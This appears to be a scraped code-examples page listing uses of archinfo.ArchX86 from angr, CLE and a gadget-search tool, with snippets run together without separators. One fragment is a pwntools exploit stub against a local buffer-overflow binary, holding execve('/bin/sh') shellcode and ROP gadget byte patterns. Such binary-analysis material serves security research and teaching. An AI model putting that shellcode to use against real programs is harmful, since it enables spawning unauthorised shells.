How to use the archinfo.ArchX86 function in archinfo
To help you get started, we’ve selected a few archinfo examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
angr / angr / tests / test_callable.py View on Github 
def test_setup_callsite():
p = angr.load_shellcode(b'b', arch=archinfo.ArchX86())
s = p.factory.call_state(0, "hello", stack_base=0x1234, alloc_base=0x5678, grow_like_stack=False)
assert (s.regs.sp == 0x1234).is_true()
assert (s.mem[0x1234 + 4].long.resolved == 0x5678).is_true()
assert (s.memory.load(0x5678, 5) == b'hello').is_true()
s = p.factory.call_state(0, "hello", stack_base=0x1234)
assert (s.regs.sp == 0x1234).is_true()
assert (s.mem[0x1234 + 4].long.resolved == 0x1234 + 8).is_true()
assert (s.memory.load(0x1234 + 8, 5) == b'hello').is_true()self._mdf = minidumpfile.MinidumpFile.parse(self.binary)
self.wow64 = False
if self.arch is None:
if getattr(self._mdf, 'sysinfo', None) is None:
raise MinidumpMissingStreamError('SystemInfo', 'The architecture was not specified')
arch = self._mdf.sysinfo.ProcessorArchitecture
if arch == SystemInfoStream.PROCESSOR_ARCHITECTURE.AMD64:
if any(module.name.endswith('wow64.dll') for module in self._mdf.modules.modules):
self.wow64 = True
self.set_arch(archinfo.ArchX86())
else:
self.set_arch(archinfo.ArchAMD64())
elif arch == SystemInfoStream.PROCESSOR_ARCHITECTURE.INTEL:
self.set_arch(archinfo.ArchX86())
else:
# has not been tested with other architectures
raise CLEError('Loading minidumps is not implemented for this architecture')
if self._mdf.memory_segments_64 is not None:
segments = self._mdf.memory_segments_64.memory_segments
elif self._mdf.memory_segments is not None:
segments = self._mdf.memory_segments.memory_segments
else:
raise MinidumpMissingStreamError('MemoryList', 'The memory segments were not defined')
for segment in segments:
data = segment.read(segment.start_virtual_address, segment.size, self._mdf.file_handle)
self.segments.append(Segment(segment.start_file_address, segment.start_virtual_address, segment.size, segment.size))
self.memory.add_backer(segment.start_virtual_address, data)def __init__(self):
super(ArchitectureX86, self).__init__( CS_ARCH_X86, CS_MODE_32, 4, 1)
self._name = 'x86'
self._maxInvalid = 6
if 'keystone' in globals():
self._ksarch = (keystone.KS_ARCH_X86, keystone.KS_MODE_32)
if 'archinfo' in globals():
self._info = archinfo.ArchX86()
self._searcher = Searcherx86()
self._pprs = [b'[\x58-\x5f]{2}\xc3', # pop reg; pop reg; ret
b'\x83\xc4\x04[\x58-\x5f]\xc3', # add esp, 4; pop reg; ret
b'[\x58-\x5f]\x83\xc4\x04\xc3', # pop reg; add esp, 4; ret
b'\x83\xc4\x08\xc3', # add esp, 8; ret;
b'\xff\x54\x24[\x08\x14\x1c\x2c\x44\x50]', # call [esp+n]
b'\xff\x64\x24[\x08\x14\x1c\x2c\x44\x50]', # jmp [esp+n]
b'\xff\x65[\x0c\x24\x30\xfc\xf4\xe8]', # jmp [ebp+n]
b'\xff\x55[\x0c\x24\x30\xfc\xf4\xe8]' # call [ebp+n]
]self.supports_nx = True
if self.binary is None:
self._mdf = minidumpfile.MinidumpFile.parse_bytes(self._binary_stream.read())
else:
self._mdf = minidumpfile.MinidumpFile.parse(self.binary)
self.wow64 = False
if self.arch is None:
if getattr(self._mdf, 'sysinfo', None) is None:
raise MinidumpMissingStreamError('SystemInfo', 'The architecture was not specified')
arch = self._mdf.sysinfo.ProcessorArchitecture
if arch == SystemInfoStream.PROCESSOR_ARCHITECTURE.AMD64:
if any(module.name.endswith('wow64.dll') for module in self._mdf.modules.modules):
self.wow64 = True
self.set_arch(archinfo.ArchX86())
else:
self.set_arch(archinfo.ArchAMD64())
elif arch == SystemInfoStream.PROCESSOR_ARCHITECTURE.INTEL:
self.set_arch(archinfo.ArchX86())
else:
# has not been tested with other architectures
raise CLEError('Loading minidumps is not implemented for this architecture')
if self._mdf.memory_segments_64 is not None:
segments = self._mdf.memory_segments_64.memory_segments
elif self._mdf.memory_segments is not None:
segments = self._mdf.memory_segments.memory_segments
else:
raise MinidumpMissingStreamError('MemoryList', 'The memory segments were not defined')
for segment in segments:import sys, logging, binascii
import archinfo
from pwn import *
from rop_compiler import ropme, goal
filename, arch = './bof_read_got_x86', archinfo.ArchX86()
p = process([filename,'3000'])
#gdb.attach(p, "set disassembly-flavor intel\nbreak *0x0804856a\n")
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-827.php
"\x31\xc0" # xor eax,eax
+ "\x50" # push eax
+ "\x68\x2f\x2f\x73\x68" # push 0x68732f2f
+ "\x68\x2f\x62\x69\x6e" # push 0x6e69622f
+ "\x89\xe3" # mov ebx,esp
+ "\x50" # push eax
+ "\x53" # push ebx
+ "\x89\xe1" # mov ecx,esp
+ "\x31\xd2" # xor edx,edx
+ "\xb0\x0b" # mov al,0xb
+ "\xcd\x80" # int 0x80
)# TODO: what the hell is this
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
if _rtld_global_ro is not None:
pass
libc_obj = self.project.loader.find_object('libc.so.6')
if libc_obj:
self._weak_hook_symbol('_dl_vdso_vsym', L['libc.so.6'].get('_dl_vdso_vsym', self.arch), libc_obj)
tls_obj = self.project.loader.tls_object
if tls_obj is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x28, 0x5f43414e4152595f)
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
elif isinstance(self.project.arch, ArchX86):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x10, self._vsyscall_addr)
elif isinstance(self.project.arch, ArchARM):
self.project.hook(0xffff0fe0, P['linux_kernel']['_kernel_user_helper_get_tls']())
# Only set up ifunc resolution if we are using the ELF backend on AMD64
if isinstance(self.project.loader.main_object, MetaELF):
if isinstance(self.project.arch, ArchAMD64):
for binary in self.project.loader.all_objects:
if not isinstance(binary, MetaELF):
continue
for reloc in binary.relocs:
if reloc.symbol is None or reloc.resolvedby is None:
continue
try:
if reloc.resolvedby.elftype != 'STT_GNU_IFUNC': @classmethod
def _match(cls, arch, args, sp_delta): # pylint: disable=unused-argument
# never appears anywhere except syscalls
return False
@staticmethod
def syscall_num(state):
return state.regs.eax
class SimCCX86WindowsSyscall(SimCC):
# TODO: Make sure the information is correct
ARG_REGS = [ ]
FP_ARG_REGS = [ ]
RETURN_VAL = SimRegArg('eax', 4)
RETURN_ADDR = SimRegArg('ip_at_syscall', 4)
ARCH = archinfo.ArchX86
@classmethod
def _match(cls, arch, args, sp_delta): # pylint: disable=unused-argument
# never appears anywhere except syscalls
return False
@staticmethod
def syscall_num(state):
return state.regs.eax
class SimCCSystemVAMD64(SimCC):
ARG_REGS = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
FP_ARG_REGS = ['xmm0', 'xmm1', 'xmm2', 'xmm3', 'xmm4', 'xmm5', 'xmm6', 'xmm7']
STACKARG_SP_DIFF = 8 # Return address is pushed on to stack by call
CALLER_SAVED_REGS = [ 'rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9', 'r10', 'r11', 'rax', ]
RETURN_ADDR = SimStackArg(0, 8)archinfo
Classes with architecture-specific information useful to other projects.
Package Health Score
79 / 100Popular archinfo functions
- archinfo.arch.Arch
- archinfo.arch.Endness
- archinfo.arch.Endness.BE
- archinfo.arch.Endness.LE
- archinfo.arch.Register
- archinfo.arch.register_arch
- archinfo.arch_arm.is_arm_arch
- archinfo.arch_from_id
- archinfo.arch_soot.ArchSoot
- archinfo.arch_soot.SootAddressDescriptor
- archinfo.arch_soot.SootAddressTerminator
- archinfo.arch_soot.SootArgument
- archinfo.arch_soot.SootMethodDescriptor
- archinfo.arch_soot.SootMethodDescriptor.from_soot_method
- archinfo.ArchAMD64
- archinfo.ArchARM
- archinfo.archerror.ArchError
- archinfo.ArchMIPS32
- archinfo.ArchX86
- archinfo.Endness